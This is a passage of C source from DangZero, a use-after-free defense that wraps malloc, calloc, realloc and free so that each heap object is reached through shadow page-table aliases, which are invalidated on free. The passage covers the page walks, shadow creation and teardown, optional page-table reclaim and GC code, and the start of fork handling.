417 | } 418 | 419 | phys_addr_t get_phys_addr_user(uintptr_t addr) 420 | { 421 | uintptr_t* page = g_cr3; 422 | phys_addr_t phys_page; 423 | unsigned short index; 424 | 425 | // level 4 426 | index = PML4_INDEX(addr); 427 | page = get_table_page(page, index); 428 | if(UNLIKELY(page == NULL)) return 0; 429 | 430 | // level 3 431 | index = PDPT_INDEX(addr); 432 | page = get_table_page(page, index); 433 | if(UNLIKELY(page == NULL)) return 0; 434 | 435 | // level 2 436 | index = PDE_INDEX(addr); 437 | page = get_table_page(page, index); 438 | if(UNLIKELY(page == NULL)) return 0; 439 | 440 | // phys page 441 | index = PTE_INDEX(addr); 442 | phys_page = *(page+index); 443 | if(UNLIKELY(!(phys_page & PAGE_PRESENT))) return 0; 444 | 445 | return phys_page; 446 | } 447 | 448 | uintptr_t* step_shadow_table_L2cpt(uintptr_t* table, unsigned short index) 449 | { 450 | // this assumes table == L2 (PD) 451 | uintptr_t* next_table; 452 | if(*(table+index) & PAGE_PRESENT){ 453 | next_table = get_table_page_nocheck(table, index); 454 | } 455 | else if(*(table+index) & PTE_COMPRESSED){ 456 | next_table = uncompress_pte(2, (pte_t*)(table+index)); 457 | } 458 | else{ 459 | // create new level 460 | next_table = create_page_table(table, index); 461 | } 462 | 463 | return next_table; 464 | } 465 | 466 | uintptr_t* step_shadow_table(uintptr_t* table, unsigned short index) 467 | { 468 | uintptr_t* next_table; 469 | if(!(*(table+index) & PAGE_PRESENT)){ 470 | next_table = create_page_table(table, index); 471 | } 472 | else{ 473 | next_table = get_table_page_nocheck(table, index); 474 | } 475 | return next_table; 476 | } 477 | 478 | 479 | int can_reclaim_pt(uintptr_t* pt) 480 | { 481 | unsigned short index; 482 | for(index = 0; index < 512; index++){ 483 | if(!(*(pt+index) & PTE_INVALIDATED)){ 484 | return 0; 485 | } 486 | } 487 | return 1; 488 | } 489 | 490 | 491 | void disable_shadow_one(uintptr_t addr) 492 | { 493 | // uintptr_t* page; 494 | uintptr_t *pdpt, *pde, *pte; 495 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 496 | 497 | // do a page walk to find PTE of addr 498 | 499 | // level 4 500 | pml4_index = PML4_INDEX(addr); 501 | pdpt = get_table_page(g_cr3, pml4_index); //pdpt=cr3+pml4_index 502 | if(UNLIKELY(pdpt == NULL)) return; 503 | 504 | // level 3 505 | pdpt_index = PDPT_INDEX(addr); 506 | pde = get_table_page(pdpt, pdpt_index); //pde=pdpt+pdpt_index 507 | if(UNLIKELY(pde == NULL)) return; 508 | 509 | // level 2 510 | pde_index = PDE_INDEX(addr); 511 | pte = get_table_page(pde, pde_index); //pte=pde+pde_index 512 | if(UNLIKELY(pte == NULL)) return; 513 | 514 | // level 1 515 | pte_index = PTE_INDEX(addr); 516 | 517 | // remove PAGE_PRESENT from the PTE 518 | *(pte+pte_index) = PTE_INVALIDATED; 519 | #ifdef __GC 520 | *(pte+pte_index) |= PTE_OBJEND; 521 | #endif 522 | 523 | //*(pte+index) &= ~(PAGE_PRESENT); // *pte+pte_index == pointer to PA 524 | 525 | // flush TLB 526 | asm volatile("invlpg (%0)" :: "r" (addr) : "memory"); 527 | 528 | //try_collect_pt(addr, 1); 529 | 530 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 531 | try_compress_pt(addr, 1); 532 | #elif defined(__PT_RECLAIM) 533 | // PT RECLAIM 534 | if(can_reclaim_pt(pte)){ 535 | *(pde+pde_index) = PTE_INVALIDATED | PTE_ALIASSES; 536 | free_pages((unsigned long)pte, 0); 537 | #ifdef __TRACK_MEM_USAGE 538 | curr_pt_count--; 539 | #endif 540 | if(can_reclaim_pt(pde)){ 541 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 542 | free_pages((unsigned long)pde, 0); 543 | #ifdef __TRACK_MEM_USAGE 544 | curr_pt_count--; 545 | #endif 546 | } 547 | } 548 | #endif 549 | 550 | #ifdef __GC_WATERMARK 551 | invalidated_pages++; 552 | #endif 553 | 554 | } 555 | 556 | void disable_shadows(uintptr_t base, size_t num_pages) 557 | { 558 | uintptr_t *pdpt, *pde, *pte; 559 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 560 | #ifdef __GC 561 | uintptr_t saveaddr = base; 562 | #endif 563 | 564 | // page walk the first shadow 565 | // level 4 566 | pml4_index = PML4_INDEX(base); 567 | pdpt = get_table_page(g_cr3, pml4_index); 568 | if(UNLIKELY(pdpt == NULL)) return; 569 | 570 | // level 3 571 | pdpt_index = PDPT_INDEX(base); 572 | pde = get_table_page(pdpt, pdpt_index); 573 | if(UNLIKELY(pde == NULL)) return; 574 | 575 | // level 2 576 | pde_index = PDE_INDEX(base); 577 | pte = get_table_page(pde, pde_index); 578 | if(UNLIKELY(pte == NULL)) return; 579 | 580 | // level 1 581 | pte_index = PTE_INDEX(base); 582 | 583 | // remove PAGE_PRESENT from the PTE 584 | *(pte+pte_index) = PTE_INVALIDATED; 585 | //*(pte+pte_index) &= ~(PAGE_PRESENT); 586 | 587 | // flush TLB 588 | asm volatile("invlpg (%0)" :: "r" (base) : "memory"); 589 | 590 | // subsequent shadow pages are contiguous 591 | // if get_table_page fails (returns NULL) we need to cancel 592 | // this can only happen if something else disabled the shadow... 593 | 594 | size_t p; 595 | for(p = 1; p < num_pages; p++){ 596 | // move to next page table entry 597 | if(pte_index == MAX_PAGE_INDEX){ 598 | pte_index = 0; 599 | if(pde_index == MAX_PAGE_INDEX){ 600 | pde_index = 0; 601 | if(pdpt_index == MAX_PAGE_INDEX){ 602 | pdpt_index = 0; 603 | //if(pml4_index == PML4_SHADOW_END) // not on free 604 | pml4_index++; 605 | // update subsequent level pages (pdpt, pde, pte) 606 | pdpt = get_table_page(g_cr3, pml4_index); 607 | pde = get_table_page(pdpt, 0); 608 | pte = get_table_page(pde, 0); 609 | } 610 | else{ 611 | #ifdef __PT_RECLAIM 612 | // pte can already be reclaimed at this point 613 | if(can_reclaim_pt(pde)){ 614 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 615 | free_pages((unsigned long)pde, 0); 616 | #ifdef __TRACK_MEM_USAGE 617 | curr_pt_count--; 618 | #endif 619 | } 620 | #endif 621 | pdpt_index++; 622 | // update subsequent level pages (pde, pte) 623 | pde = get_table_page(pdpt, pdpt_index); 624 | pte = get_table_page(pde, 0); 625 | } 626 | } 627 | else{ 628 | #ifdef __PT_RECLAIM 629 | if(can_reclaim_pt(pte)){ 630 | *(pde+pde_index) = PTE_INVALIDATED | PTE_ALIASSES; 631 | free_pages((unsigned long)pte, 0); 632 | #ifdef __TRACK_MEM_USAGE 633 | curr_pt_count--; 634 | #endif 635 | } 636 | #endif 637 | pde_index++; 638 | // update subsequent level pages (pte) 639 | pte = get_table_page(pde, pde_index); 640 | } 641 | } 642 | else{ 643 | pte_index++; 644 | } 645 | 646 | // remove PAGE_PRESENT from the PTE 647 | *(pte+pte_index) = PTE_INVALIDATED; 648 | //*(pte+pte_index) &= ~(PAGE_PRESENT); 649 | #ifdef __GC 650 | if(p+1 == num_pages){ 651 | *(pte+pte_index) |= PTE_OBJEND; 652 | } 653 | #endif 654 | // flush TLB 655 | base += PAGE_SIZE; 656 | asm volatile("invlpg (%0)" :: "r" (base) : "memory"); 657 | } 658 | 659 | //try_collect_pt(saveaddr, num_pages); 660 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 661 | try_compress_pt(saveaddr, num_pages); 662 | #elif defined(__PT_RECLAIM) 663 | // PT RECLAIM 664 | if(can_reclaim_pt(pte)){ 665 | *(pde+pde_index) = PTE_INVALIDATED | PTE_ALIASSES; 666 | free_pages((unsigned long)pte, 0); 667 | #ifdef __TRACK_MEM_USAGE 668 | curr_pt_count--; 669 | #endif 670 | if(can_reclaim_pt(pde)){ 671 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 672 | free_pages((unsigned long)pde, 0); 673 | #ifdef __TRACK_MEM_USAGE 674 | curr_pt_count--; 675 | #endif 676 | } 677 | } 678 | #endif 679 | 680 | #ifdef __GC_WATERMARK 681 | invalidated_pages += num_pages; 682 | #endif 683 | } 684 | 685 | uintptr_t* create_shadow_one(uintptr_t canon, size_t offset) 686 | { 687 | phys_addr_t phys_user; 688 | volatile int8_t tmp; // in case ptr is 1 byte? 689 | uintptr_t cur_shadow; 690 | 691 | #ifdef __GC 692 | struct vp_span *span; 693 | if(cur_span != NULL){ 694 | // any non-empty span is sufficient for 1 page 695 | span = cur_span; 696 | } 697 | else{ 698 | span = opt_freelist->items.lh_first; 699 | 700 | // if span == NULL we are completely OOM 701 | // assert(span != NULL); 702 | 703 | // update global cur_span 704 | if(cur_span != NULL){ 705 | // disable prev span sync 706 | cur_span->last_sync = false; 707 | } 708 | cur_span = span; 709 | } 710 | 711 | if(!span->last_sync){ 712 | update_span_last_ptrs(span); 713 | // TODO: skip initial entry++ 714 | } 715 | 716 | cur_shadow = span->start; 717 | span->start += PAGE_SIZE; 718 | if(span->start > highest_shadow) 719 | highest_shadow = span->start; 720 | 721 | if (span_empty(span)) { 722 | LOG("span %p is now empty, deallocating\n", span); 723 | LIST_REMOVE(span, freelist); 724 | #ifdef WM_ZERO 725 | span->start = 0; span->end = 0; 726 | #endif 727 | WM_FREE(span); 728 | // set global span to NULL 729 | cur_span = NULL; 730 | } 731 | #else 732 | cur_shadow = free_span.start; 733 | free_span.start += PAGE_SIZE; 734 | #endif 735 | 736 | // get next shadow entry 737 | if(_last_pte_index == MAX_PAGE_INDEX){ 738 | _last_pte_index = 0; 739 | if(_last_pde_index == MAX_PAGE_INDEX){ 740 | _last_pde_index = 0; 741 | if(_last_pdpt_index == MAX_PAGE_INDEX){ 742 | _last_pdpt_index = 0; 743 | // if last_pml4_index == PML4_SHADOW_END -> PANIC 744 | 745 | _last_pml4_index++; 746 | // update subsequent level pages (pdpt, pde, pte) 747 | _last_pdpt = step_shadow_table(g_cr3, _last_pml4_index); 748 | _last_pde = step_shadow_table(_last_pdpt, 0); 749 | #ifdef __GC_PT_COMPRESS 750 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 751 | #else 752 | _last_pte = step_shadow_table(_last_pde, 0); 753 | #endif 754 | } 755 | else{ 756 | _last_pdpt_index++; 757 | // update subsequent level pages (pde, pte) 758 | _last_pde = step_shadow_table(_last_pdpt, _last_pdpt_index); 759 | #ifdef __GC_PT_COMPRESS 760 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 761 | #else 762 | _last_pte = step_shadow_table(_last_pde, 0); 763 | #endif 764 | } 765 | } 766 | else{ 767 | _last_pde_index++; 768 | // update subsequent level pages (pte) 769 | #ifdef __GC_PT_COMPRESS 770 | _last_pte = step_shadow_table_L2cpt(_last_pde, _last_pde_index); 771 | #else 772 | _last_pte = step_shadow_table(_last_pde, _last_pde_index); 773 | #endif 774 | } 775 | } 776 | else{ 777 | _last_pte_index++; 778 | } 779 | 780 | // pre fault the page 781 | tmp = *(int8_t*)(canon); 782 | *(int8_t*)(canon) = tmp; 783 | 784 | // get the physical page belonging to the allocation 785 | phys_user = get_phys_addr_user(canon); 786 | 787 | // pte+pte_index now has to alias-point to the phys addr 788 | *(_last_pte+_last_pte_index) = (phys_user & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 789 | 790 | // store the canonical page in malloc header at the start of the allocation 791 | *((uintptr_t*)(cur_shadow+offset)) = canon; 792 | 793 | #ifdef __GC_WATERMARK 794 | if(invalidated_pages >= __GC_WATERMARK){ 795 | invalidated_pages = 0; 796 | if(cur_span != NULL){ 797 | cur_span->last_sync = false; 798 | cur_span = NULL; 799 | } 800 | gc_run(); 801 | } 802 | #endif 803 | 804 | // return the shadow page with the original in-page offset and canon padding 805 | return (uintptr_t*) (cur_shadow + offset + sizeof(void*)); 806 | } 807 | 808 | uintptr_t* create_shadows(uintptr_t canon, size_t num_pages, size_t offset) 809 | { 810 | uintptr_t start_shadow; 811 | phys_addr_t phys_user; 812 | volatile uintptr_t canon_page = canon; 813 | int8_t tmp; 814 | 815 | #ifdef __GC 816 | struct vp_span *span; 817 | if(cur_span != NULL && span_num_pages(cur_span) >= num_pages){ 818 | span = cur_span; 819 | } 820 | else{ 821 | struct vp_freelist *list = opt_freelist; 822 | LIST_FOREACH(span, &list->items, freelist) { 823 | if (span_num_pages(span) >= num_pages) { 824 | break; 825 | } 826 | } 827 | 828 | // if span==NULL we are completely OOM 829 | // assert(span != NULL); 830 | 831 | if(cur_span != NULL){ 832 | // disable prev span sync 833 | cur_span->last_sync = false; 834 | } 835 | cur_span = span; 836 | } 837 | 838 | if(!span->last_sync){ 839 | update_span_last_ptrs(span); 840 | // TODO: skip initial entry++ 841 | } 842 | 843 | start_shadow = span->start; 844 | span->start += num_pages * PGSIZE; 845 | if(span->start > highest_shadow) 846 | highest_shadow = span->start; 847 | 848 | // LOG("satisfying %zu page alloc from span %p => 0x%lx\n", num_pages, span, start_shadow); 849 | 850 | if (span_empty(span)) { 851 | LOG("span %p is now empty, deallocating\n", span); 852 | LIST_REMOVE(span, freelist); 853 | #ifdef WM_ZERO 854 | span->start = 0; span->end = 0; 855 | #endif 856 | WM_FREE(span); 857 | cur_span = NULL; 858 | } 859 | #else 860 | start_shadow = free_span.start; 861 | free_span.start += (num_pages * PAGE_SIZE); 862 | #endif 863 | 864 | size_t p; 865 | for(p = 0; p < num_pages; p++){ 866 | 867 | // move to next page table entry 868 | if(_last_pte_index == MAX_PAGE_INDEX){ 869 | _last_pte_index = 0; 870 | if(_last_pde_index == MAX_PAGE_INDEX){ 871 | _last_pde_index = 0; 872 | if(_last_pdpt_index == MAX_PAGE_INDEX){ 873 | _last_pdpt_index = 0; 874 | // if last_pml4_index == PML4_SHADOW_END -> PANIC 875 | 876 | _last_pml4_index++; 877 | // update subsequent level pages (pdpt, pde, pte) 878 | _last_pdpt = step_shadow_table(g_cr3, _last_pml4_index); 879 | _last_pde = step_shadow_table(_last_pdpt, 0); 880 | #ifdef __GC_PT_COMPRESS 881 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 882 | #else 883 | _last_pte = step_shadow_table(_last_pde, 0); 884 | #endif 885 | } 886 | else{ 887 | _last_pdpt_index++; 888 | // update subsequent level pages (pde, pte) 889 | _last_pde = step_shadow_table(_last_pdpt, _last_pdpt_index); 890 | #ifdef __GC_PT_COMPRESS 891 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 892 | #else 893 | _last_pte = step_shadow_table(_last_pde, 0); 894 | #endif 895 | } 896 | } 897 | else{ 898 | _last_pde_index++; 899 | // update subsequent level pages (pte) 900 | #ifdef __GC_PT_COMPRESS 901 | _last_pte = step_shadow_table_L2cpt(_last_pde, _last_pde_index); 902 | #else 903 | _last_pte = step_shadow_table(_last_pde, _last_pde_index); 904 | #endif 905 | } 906 | } 907 | else{ 908 | _last_pte_index++; 909 | } 910 | 911 | // pre fault page 912 | tmp = *(int8_t*)(canon_page); 913 | *(int8_t*)(canon_page) = tmp; 914 | 915 | // get phys addr of the page 916 | phys_user = get_phys_addr_user(canon_page); 917 | 918 | // move canon page to the next one 919 | canon_page += PAGE_SIZE; 920 | 921 | // pte+pte_index now has to alias-point to the phys addr 922 | *(_last_pte+_last_pte_index) = (phys_user & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 923 | } 924 | 925 | // store the canonical page in malloc header at the start of the allocation 926 | *((uintptr_t*)(start_shadow+offset)) = canon; 927 | 928 | #ifdef __GC_WATERMARK 929 | if(invalidated_pages >= __GC_WATERMARK){ 930 | invalidated_pages = 0; 931 | if(cur_span != NULL){ 932 | cur_span->last_sync = false; 933 | cur_span = NULL; 934 | } 935 | gc_run(); 936 | } 937 | #endif 938 | 939 | // return the shadow page with the original in-page offset and canon padding 940 | return (uintptr_t*) (start_shadow + offset + sizeof(void*)); 941 | } 942 | 943 | void* malloc(size_t size) 944 | { 945 | if(process) 946 | { 947 | // call the original malloc with padded size 948 | void* canon = __libc_malloc(size + sizeof(void*)); 949 | 950 | if(UNLIKELY(canon == NULL)) return NULL; 951 | 952 | // get the actual size of the allocated object (incl. alignment) 953 | const size_t usable_sz = malloc_usable_size(canon); 954 | 955 | // determine the offset of the object into its (first) page 956 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 957 | 958 | // determine how many pages the allocation spans 959 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 960 | 961 | // create shadow 962 | uintptr_t* shadow_result = NULL; 963 | if(num_pages == 1){ 964 | shadow_result = create_shadow_one((uintptr_t)canon, page_offset); 965 | } 966 | else{ 967 | shadow_result = create_shadows((uintptr_t)canon, num_pages, page_offset); 968 | } 969 | #ifdef __TRACK_SHADOW_SIZE 970 | nallocs++; 971 | if(nallocs % OUTPUT_FREQ == 0){ 972 | output_shadow_size(false); 973 | } 974 | #endif 975 | return (void*)shadow_result; 976 | } 977 | 978 | return __libc_malloc(size); 979 | } 980 | 981 | void* calloc(size_t nmemb, size_t size) 982 | { 983 | if(process) 984 | { 985 | size_t numadj = 0, sizeadj = 0; 986 | // minimal adjustment 987 | if(nmemb==1) 988 | sizeadj = sizeof(void*); 989 | else if(size <= sizeof(void*)) 990 | numadj = (sizeof(void*) + sizeof(void*)-1) / size; 991 | else{ 992 | // consider: 10x500 bytes vs 500x10 bytes 993 | if((nmemb+1)*size < nmemb*(size+sizeof(void*))) 994 | numadj = 1; 995 | else 996 | sizeadj = sizeof(void*); 997 | } 998 | 999 | // padding may be more than 8 bytes, but thats ok 1000 | void* canon = __libc_calloc(nmemb+numadj, size+sizeadj); 1001 | if(UNLIKELY(canon == NULL)) return NULL; 1002 | 1003 | // get the actual size of the allocated object (incl. alignment) 1004 | const size_t usable_sz = malloc_usable_size(canon); 1005 | 1006 | // determine the offset of the object into its (first) page 1007 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1008 | 1009 | // determine how many pages the allocation spans 1010 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 1011 | 1012 | // create shadow 1013 | uintptr_t* shadow_result = NULL; 1014 | if(num_pages == 1){ 1015 | shadow_result = create_shadow_one((uintptr_t)canon, page_offset); 1016 | } 1017 | else{ 1018 | shadow_result = create_shadows((uintptr_t)canon, num_pages, page_offset); 1019 | } 1020 | #ifdef __TRACK_SHADOW_SIZE 1021 | nallocs++; 1022 | if(nallocs % OUTPUT_FREQ == 0){ 1023 | output_shadow_size(false); 1024 | } 1025 | #endif 1026 | return (void*)shadow_result; 1027 | } 1028 | return __libc_calloc(nmemb, size); 1029 | } 1030 | 1031 | void* realloc(void *ptr, size_t size) 1032 | { 1033 | if(process) 1034 | { 1035 | // if ptr == NULL, call is equivalent to malloc(size) 1036 | if(UNLIKELY(ptr==NULL)){ 1037 | return malloc(size); 1038 | } 1039 | 1040 | // if size == zero, and ptr is not NULL, call equivalent to free(ptr); 1041 | if(UNLIKELY(size == 0)){ 1042 | free(ptr); 1043 | return NULL; 1044 | } 1045 | #ifdef __SANITY_CHECK 1046 | if((uintptr_t)ptr < SHADOW_BASE || (uintptr_t)ptr >= SHADOW_END){ 1047 | //fprintf(fp, "fatal: ptr out of range: %p\n", ptr); 1048 | return __libc_realloc(ptr, size); 1049 | } 1050 | #endif 1051 | /* ptr mustve been obtained from malloc or calloc, so should be in shadow bounds anyway */ 1052 | 1053 | // get the canonical address 1054 | void* canon = (void*)(*(uintptr_t*)(ptr - sizeof(void*))); 1055 | 1056 | // get the size, offset, and number of pages of the old object 1057 | const size_t pre_usable_sz = malloc_usable_size(canon); 1058 | const size_t pre_page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1059 | const size_t pre_num_pages = (pre_usable_sz + pre_page_offset - 1) / (PAGE_SIZE) + 1; 1060 | 1061 | void* recanon = __libc_realloc(canon, size + sizeof(void*)); 1062 | if(UNLIKELY(recanon == NULL)) return NULL; 1063 | 1064 | // get the size, offset, and number of pages of the new object 1065 | const size_t post_usable_sz = malloc_usable_size(recanon); 1066 | const size_t post_page_offset = (uintptr_t)recanon & (PAGE_SIZE - 1); 1067 | const size_t post_num_pages = (post_usable_sz + post_page_offset - 1) / (PAGE_SIZE) + 1; 1068 | 1069 | // NOTE: we cannot guarantee that we can extend the shadows in-place 1070 | // since this depends on the state of the shadows 1071 | // instead, we return a new shadow mapping 1072 | 1073 | // if realloc in place: check for identical or shrinking num pages 1074 | 1075 | if(canon == recanon){ 1076 | if(pre_num_pages > post_num_pages){ 1077 | // apply shrink 1078 | size_t num_remove = pre_num_pages - post_num_pages; 1079 | size_t startp = pre_num_pages - num_remove; 1080 | uintptr_t start_shadow = (uintptr_t)ptr + (startp * PAGE_SIZE); 1081 | 1082 | // disable the shadows that cover the shrinkage 1083 | if(num_remove == 1) 1084 | disable_shadow_one(start_shadow & PAGE_MASK); 1085 | else 1086 | disable_shadows(start_shadow & PAGE_MASK, num_remove); 1087 | return ptr; 1088 | } 1089 | else if(pre_num_pages == post_num_pages){ 1090 | // identical pages in-place, do nothing 1091 | return ptr; 1092 | } 1093 | } 1094 | 1095 | // disable the old shadow pages 1096 | uintptr_t first_shadow = (uintptr_t)ptr & PAGE_MASK; 1097 | if(pre_num_pages == 1){ 1098 | disable_shadow_one(first_shadow); 1099 | } 1100 | else{ 1101 | disable_shadows(first_shadow, pre_num_pages); 1102 | } 1103 | 1104 | // else: reallocation is extended / moved (canon is free). free old shadows & create new 1105 | uintptr_t* shadow_result = NULL; 1106 | if(post_num_pages == 1){ 1107 | shadow_result = create_shadow_one((uintptr_t)recanon, post_page_offset); 1108 | } 1109 | else{ 1110 | shadow_result = create_shadows((uintptr_t)recanon, post_num_pages, post_page_offset); 1111 | } 1112 | 1113 | #ifdef __TRACK_SHADOW_SIZE 1114 | nallocs++; 1115 | if(nallocs % OUTPUT_FREQ == 0){ 1116 | output_shadow_size(false); 1117 | } 1118 | #endif 1119 | return (void*)shadow_result; 1120 | } 1121 | return __libc_realloc(ptr, size); 1122 | } 1123 | 1124 | void free(void* ptr) 1125 | { 1126 | if(process) 1127 | { 1128 | // printf("[DangZero]: Free Shadow @ %p (cr3=%p)\n", ptr, g_cr3); 1129 | 1130 | #ifdef __SANITY_CHECK 1131 | if((uintptr_t)ptr < SHADOW_BASE || (uintptr_t)ptr >= SHADOW_END){ 1132 | //printf("[!!] request free non-shadow %p\n", ptr); 1133 | __libc_free(ptr); 1134 | return; 1135 | } 1136 | #else 1137 | if(UNLIKELY(ptr==NULL)){ 1138 | return; 1139 | } 1140 | #endif 1141 | 1142 | void* canon = (void*)(*(uintptr_t*)(ptr - sizeof(void*))); 1143 | 1144 | // find out how many shadow pages were created for object 1145 | const size_t usable_sz = malloc_usable_size(canon); 1146 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1147 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 1148 | 1149 | // disable the shadow pages 1150 | uintptr_t first_shadow = (uintptr_t)ptr & PAGE_MASK; 1151 | if(num_pages == 1){ 1152 | disable_shadow_one(first_shadow); 1153 | } 1154 | else{ 1155 | disable_shadows(first_shadow, num_pages); 1156 | } 1157 | #ifdef __GC 1158 | // zero out 1159 | memset(canon, 0, usable_sz); 1160 | #endif 1161 | // free the original canonical object 1162 | __libc_free(canon); 1163 | 1164 | return; 1165 | } 1166 | 1167 | __libc_free(ptr); 1168 | } 1169 | 1170 | int posix_memalign(void **memptr, size_t alignment, size_t size) 1171 | { 1172 | if(process) 1173 | { 1174 | *memptr = malloc(size); 1175 | if(*memptr != NULL) return 0; 1176 | return 12; // ENOMEM 1177 | } 1178 | return __posix_memalign(memptr, alignment, size); 1179 | } 1180 | 1181 | void* memalign(size_t alignment, size_t size) 1182 | { 1183 | if(process) 1184 | { 1185 | return malloc(size); 1186 | } 1187 | return __libc_memalign(alignment, size); 1188 | } 1189 | 1190 | void __attribute__((destructor)) exit_unload() 1191 | { 1192 | if(process) 1193 | { 1194 | #ifdef __GC 1195 | // run GC once at the end 1196 | // gc_run(); 1197 | #endif 1198 | // printf("[DangZero]: Destructor exit\n"); 1199 | //fprintf(stderr, "[dangzero] destructor entry\n"); 1200 | //fflush(stderr); 1201 | 1202 | #ifdef __TRACK_MEM_USAGE 1203 | #ifdef __NGINX_MODE 1204 | struct rusage u; 1205 | if(getrusage(RUSAGE_SELF, &u) == 0){ 1206 | printf("[mem-usage] ru_maxrss %lu\n", u.ru_maxrss); 1207 | } 1208 | printf("[mem-usage] max_pt_count %lu\n", max_pt_count); 1209 | printf("[mem-usage] curr_pt_count %lu\n", curr_pt_count); 1210 | fflush(stdout); 1211 | #else 1212 | fprintf(stderr, "[setup-report] max_pt_count: %lu\n", max_pt_count); 1213 | fprintf(stderr, "[setup-report] curr_pt_count: %lu\n", curr_pt_count); 1214 | // fprintf(stderr, "[setup-report] maxrss_seen: %ld\n", maxrss_seen); 1215 | fprintf(stderr, "[setup-report] end rusage-counters\n"); 1216 | fflush(stderr); 1217 | #endif 1218 | #endif 1219 | 1220 | #ifdef __GC 1221 | uint64_t end_addr = highest_shadow; 1222 | #else 1223 | uint64_t end_addr = free_span.start; 1224 | #endif 1225 | unsigned short pml4_index = PML4_SHADOW_START; 1226 | unsigned short pdpt_index = 0, pde_index = 0; 1227 | unsigned short end_pml4 = PML4_INDEX(end_addr); 1228 | unsigned short end_pdpt = PDPT_INDEX(end_addr); 1229 | unsigned short end_pde = PDE_INDEX(end_addr); 1230 | uintptr_t *pdpt, *pde, *pte; 1231 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1232 | bool cpt = false; 1233 | #endif 1234 | 1235 | // main loop: exhaust all entries 1236 | while(pml4_index < end_pml4){ 1237 | pdpt = get_table_page(g_cr3, pml4_index); 1238 | if(pdpt == NULL) { pml4_index++; continue; } 1239 | pdpt_index = 0; 1240 | while(pdpt_index <= MAX_PAGE_INDEX){ 1241 | pde = get_table_page(pdpt, pdpt_index); 1242 | if(pde == NULL) { pdpt_index++; continue; } 1243 | pde_index = 0; 1244 | while(pde_index <= MAX_PAGE_INDEX){ 1245 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1246 | pte = get_table_page_L2cpt(pde, pde_index, &cpt); 1247 | #else 1248 | pte = get_table_page(pde, pde_index); 1249 | #endif 1250 | if(pte == NULL) { pde_index++; continue; } 1251 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1252 | // if compressed and page aligned 1253 | if(cpt && (((uintptr_t)pte & 0xfff)==0)) 1254 | #endif 1255 | free_pages((unsigned long)pte, 0); 1256 | pde_index++; 1257 | } 1258 | free_pages((unsigned long)pde, 0); 1259 | pdpt_index++; 1260 | } 1261 | free_pages((unsigned long)pdpt, 0); 1262 | pml4_index++; 1263 | } 1264 | 1265 | // last pml4: pml4_index == end_pml4 1266 | pdpt = get_table_page(g_cr3, pml4_index); 1267 | if(pdpt != NULL) { 1268 | pdpt_index = 0; 1269 | while(pdpt_index <= end_pdpt){ // only till end 1270 | pde = get_table_page(pdpt, pdpt_index); 1271 | if(pde == NULL) { pdpt_index++; continue; } 1272 | pde_index = 0; 1273 | while(pde_index <= MAX_PAGE_INDEX){ // slight over approx 1274 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1275 | pte = get_table_page_L2cpt(pde, pde_index, &cpt); 1276 | #else 1277 | pte = get_table_page(pde, pde_index); 1278 | #endif 1279 | if(pte == NULL) { pde_index++; continue; } 1280 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1281 | // if compressed and page aligned 1282 | if(cpt && (((uintptr_t)pte & 0xfff)==0)) 1283 | #endif 1284 | free_pages((unsigned long)pte, 0); 1285 | pde_index++; 1286 | } 1287 | free_pages((unsigned long)pde, 0); 1288 | pdpt_index++; 1289 | } 1290 | free_pages((unsigned long)pdpt, 0); 1291 | } 1292 | 1293 | #ifdef __GC 1294 | // return the memory of freelist structures 1295 | /*if(g_freelist != NULL){ 1296 | for(int i = 0; i < NUM_BUCKETS; i++){ 1297 | if(g_freelist[i].items.lh_first != NULL) 1298 | { 1299 | freelist_reset(&g_freelist[i]); 1300 | } 1301 | } 1302 | __libc_free(g_freelist); 1303 | }*/ 1304 | 1305 | if(opt_freelist != NULL && opt_freelist->items.lh_first != NULL){ 1306 | freelist_reset(opt_freelist); 1307 | __libc_free(opt_freelist); 1308 | } 1309 | #ifdef __GC_PT_COMPRESS 1310 | // return the memory of compression freelist 1311 | cpt_destruct(); 1312 | #endif 1313 | #endif 1314 | #ifdef __TRACK_SHADOW_SIZE 1315 | process=0; 1316 | if(shw_fp != NULL) fclose(shw_fp); 1317 | process=1; 1318 | #endif 1319 | // printf("[DangZero]: Destructor done\n"); 1320 | //fprintf(stderr, "[dangzero] destructor exit\n"); 1321 | //fflush(stderr); 1322 | } 1323 | } 1324 | 1325 | void apply_fork_map(uintptr_t* p_cr3, struct map_pa_va* addr_map, size_t num_addrs) 1326 | { 1327 | // we need to create the shadow tables again in the current process 1328 | // and additionally need new physical backing for each PTE 1329 | 1330 | #ifdef __GC 1331 | uintptr_t end_addr = highest_shadow; 1332 | #else 1333 | uintptr_t end_addr = free_span.start; // until the next free spot 1334 | #endif 1335 | 1336 | uintptr_t cur_addr = SHADOW_BASE; 1337 | 1338 | unsigned short pml4_index=PML4_SHADOW_START, pdpt_index, pde_index, pte_index; 1339 | unsigned short max_pml4=PML4_INDEX(end_addr); 1340 | uintptr_t *pdpt, *pde, *pte; 1341 | uintptr_t *c_pdpt, *c_pde, *c_pte; 1342 | size_t i = 0; 1343 | size_t store_i; 1344 | phys_addr_t p_pa; 1345 | phys_addr_t last_pa = 0; 1346 | phys_addr_t cow_back = 0; 1347 | volatile int8_t tmp; 